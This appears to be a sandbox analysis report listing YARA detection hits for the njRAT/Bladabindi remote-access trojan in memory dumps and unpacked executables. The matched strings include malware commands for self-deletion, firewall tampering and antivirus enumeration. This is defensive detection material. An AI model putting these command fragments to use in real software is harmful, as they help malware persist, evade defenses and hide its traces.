00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5567:$a1: get_Registry 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6744:$a3: Download ERROR 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6a0c:$a5: netsh firewall delete allowedprogram "
00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6964:$a1: netsh firewall add allowedprogram 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6af4:$b1: [TAP] 0x6a6c:$c3: cmd.exe /c ping
00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6934:$reg: SEE_MASK_NOZONECHECKS 0x6720:$msg: Execute ERROR 0x6780:$msg: Execute ERROR 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5567:$a1: get_Registry 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6744:$a3: Download ERROR 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6a0c:$a5: netsh firewall delete allowedprogram "
00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6964:$a1: netsh firewall add allowedprogram 0x6934:$a2: SEE_MASK_NOZONECHECKS 0x6af4:$b1: [TAP] 0x6a6c:$c3: cmd.exe /c ping
00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6934:$reg: SEE_MASK_NOZONECHECKS 0x6720:$msg: Execute ERROR 0x6780:$msg: Execute ERROR 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
Process Memory Space: nOZ2Oqnzbz.exe PID: 7116	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: nOZ2Oqnzbz.exe PID: 6500	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: WindowsServices.exe PID: 2668	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: WindowsServices.exe PID: 1896	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: WindowsServices.exe PID: 3484	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: WindowsServices.exe PID: 6516	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: WindowsServices.exe PID: 1868	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: WindowsServices.exe PID: 6400	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Click to see the 83 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
21.1.WindowsServices.exe.400000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
21.1.WindowsServices.exe.400000.0.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
21.1.WindowsServices.exe.400000.0.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
21.1.WindowsServices.exe.400000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
21.1.WindowsServices.exe.400000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
21.1.WindowsServices.exe.400000.0.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
12.2.WindowsServices.exe.400000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
12.2.WindowsServices.exe.400000.0.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
12.2.WindowsServices.exe.400000.0.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
12.2.WindowsServices.exe.400000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
12.2.WindowsServices.exe.400000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
12.2.WindowsServices.exe.400000.0.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
18.2.WindowsServices.exe.710000.2.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
18.2.WindowsServices.exe.710000.2.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x3967:$a1: get_Registry 0x4d34:$a2: SEE_MASK_NOZONECHECKS 0x4b44:$a3: Download ERROR 0x4e6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x4e0c:$a5: netsh firewall delete allowedprogram "
18.2.WindowsServices.exe.710000.2.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x4e6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4a3e:$s1: winmgmts:\\.\root\SecurityCenter2 0x4b66:$s3: Executed As 0x41b3:$s5: Stub.exe 0x4b44:$s6: Download ERROR 0x4a00:$s8: Select * From AntiVirusProduct
18.2.WindowsServices.exe.710000.2.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d64:$a1: netsh firewall add allowedprogram 0x4d34:$a2: SEE_MASK_NOZONECHECKS 0x4ef4:$b1: [TAP] 0x4e6c:$c3: cmd.exe /c ping
18.2.WindowsServices.exe.710000.2.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d34:$reg: SEE_MASK_NOZONECHECKS 0x4b20:$msg: Execute ERROR 0x4b80:$msg: Execute ERROR 0x4e6c:$ping: cmd.exe /c ping 0 -n 2 & del
18.2.WindowsServices.exe.710000.2.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x4e0c:$s1: netsh firewall delete allowedprogram 0x4d64:$s2: netsh firewall add allowedprogram 0x4e6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x4b20:$s4: Execute ERROR 0x4b80:$s4: Execute ERROR 0x4b44:$s5: Download ERROR 0x4eaa:$s6: [kl]
9.2.WindowsServices.exe.710000.1.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
9.2.WindowsServices.exe.710000.1.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x3967:$a1: get_Registry 0x4d34:$a2: SEE_MASK_NOZONECHECKS 0x4b44:$a3: Download ERROR 0x4e6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x4e0c:$a5: netsh firewall delete allowedprogram "
9.2.WindowsServices.exe.710000.1.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x4e6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4a3e:$s1: winmgmts:\\.\root\SecurityCenter2 0x4b66:$s3: Executed As 0x41b3:$s5: Stub.exe 0x4b44:$s6: Download ERROR 0x4a00:$s8: Select * From AntiVirusProduct
9.2.WindowsServices.exe.710000.1.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d64:$a1: netsh firewall add allowedprogram 0x4d34:$a2: SEE_MASK_NOZONECHECKS 0x4ef4:$b1: [TAP] 0x4e6c:$c3: cmd.exe /c ping
9.2.WindowsServices.exe.710000.1.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d34:$reg: SEE_MASK_NOZONECHECKS 0x4b20:$msg: Execute ERROR 0x4b80:$msg: Execute ERROR 0x4e6c:$ping: cmd.exe /c ping 0 -n 2 & del
9.2.WindowsServices.exe.710000.1.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x4e0c:$s1: netsh firewall delete allowedprogram 0x4d64:$s2: netsh firewall add allowedprogram 0x4e6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x4b20:$s4: Execute ERROR 0x4b80:$s4: Execute ERROR 0x4b44:$s5: Download ERROR 0x4eaa:$s6: [kl]
7.1.WindowsServices.exe.400000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
7.1.WindowsServices.exe.400000.0.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
7.1.WindowsServices.exe.400000.0.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
7.1.WindowsServices.exe.400000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
7.1.WindowsServices.exe.400000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
7.1.WindowsServices.exe.400000.0.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
18.2.WindowsServices.exe.710000.2.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
18.2.WindowsServices.exe.710000.2.raw.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
18.2.WindowsServices.exe.710000.2.raw.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
18.2.WindowsServices.exe.710000.2.raw.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
18.2.WindowsServices.exe.710000.2.raw.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
18.2.WindowsServices.exe.710000.2.raw.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
4.2.WindowsServices.exe.2030000.1.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
4.2.WindowsServices.exe.2030000.1.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x3967:$a1: get_Registry 0x4d34:$a2: SEE_MASK_NOZONECHECKS 0x4b44:$a3: Download ERROR 0x4e6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x4e0c:$a5: netsh firewall delete allowedprogram "
4.2.WindowsServices.exe.2030000.1.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x4e6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4a3e:$s1: winmgmts:\\.\root\SecurityCenter2 0x4b66:$s3: Executed As 0x41b3:$s5: Stub.exe 0x4b44:$s6: Download ERROR 0x4a00:$s8: Select * From AntiVirusProduct
4.2.WindowsServices.exe.2030000.1.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d64:$a1: netsh firewall add allowedprogram 0x4d34:$a2: SEE_MASK_NOZONECHECKS 0x4ef4:$b1: [TAP] 0x4e6c:$c3: cmd.exe /c ping
4.2.WindowsServices.exe.2030000.1.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d34:$reg: SEE_MASK_NOZONECHECKS 0x4b20:$msg: Execute ERROR 0x4b80:$msg: Execute ERROR 0x4e6c:$ping: cmd.exe /c ping 0 -n 2 & del
4.2.WindowsServices.exe.2030000.1.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x4e0c:$s1: netsh firewall delete allowedprogram 0x4d64:$s2: netsh firewall add allowedprogram 0x4e6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x4b20:$s4: Execute ERROR 0x4b80:$s4: Execute ERROR 0x4b44:$s5: Download ERROR 0x4eaa:$s6: [kl]
3.2.nOZ2Oqnzbz.exe.400000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
3.2.nOZ2Oqnzbz.exe.400000.0.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
3.2.nOZ2Oqnzbz.exe.400000.0.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
3.2.nOZ2Oqnzbz.exe.400000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
3.2.nOZ2Oqnzbz.exe.400000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
3.2.nOZ2Oqnzbz.exe.400000.0.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
0.2.nOZ2Oqnzbz.exe.620000.1.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.2.nOZ2Oqnzbz.exe.620000.1.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x3967:$a1: get_Registry 0x4d34:$a2: SEE_MASK_NOZONECHECKS 0x4b44:$a3: Download ERROR 0x4e6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x4e0c:$a5: netsh firewall delete allowedprogram "
0.2.nOZ2Oqnzbz.exe.620000.1.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x4e6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4a3e:$s1: winmgmts:\\.\root\SecurityCenter2 0x4b66:$s3: Executed As 0x41b3:$s5: Stub.exe 0x4b44:$s6: Download ERROR 0x4a00:$s8: Select * From AntiVirusProduct
0.2.nOZ2Oqnzbz.exe.620000.1.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d64:$a1: netsh firewall add allowedprogram 0x4d34:$a2: SEE_MASK_NOZONECHECKS 0x4ef4:$b1: [TAP] 0x4e6c:$c3: cmd.exe /c ping
0.2.nOZ2Oqnzbz.exe.620000.1.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d34:$reg: SEE_MASK_NOZONECHECKS 0x4b20:$msg: Execute ERROR 0x4b80:$msg: Execute ERROR 0x4e6c:$ping: cmd.exe /c ping 0 -n 2 & del
0.2.nOZ2Oqnzbz.exe.620000.1.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x4e0c:$s1: netsh firewall delete allowedprogram 0x4d64:$s2: netsh firewall add allowedprogram 0x4e6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x4b20:$s4: Execute ERROR 0x4b80:$s4: Execute ERROR 0x4b44:$s5: Download ERROR 0x4eaa:$s6: [kl]
21.2.WindowsServices.exe.400000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
21.2.WindowsServices.exe.400000.0.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
21.2.WindowsServices.exe.400000.0.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
21.2.WindowsServices.exe.400000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
21.2.WindowsServices.exe.400000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
21.2.WindowsServices.exe.400000.0.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
12.1.WindowsServices.exe.400000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
12.1.WindowsServices.exe.400000.0.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
12.1.WindowsServices.exe.400000.0.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
12.1.WindowsServices.exe.400000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
12.1.WindowsServices.exe.400000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
12.1.WindowsServices.exe.400000.0.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
3.1.nOZ2Oqnzbz.exe.400000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
3.1.nOZ2Oqnzbz.exe.400000.0.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
4.2.WindowsServices.exe.2030000.1.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
3.1.nOZ2Oqnzbz.exe.400000.0.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
4.2.WindowsServices.exe.2030000.1.raw.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
3.1.nOZ2Oqnzbz.exe.400000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
3.1.nOZ2Oqnzbz.exe.400000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
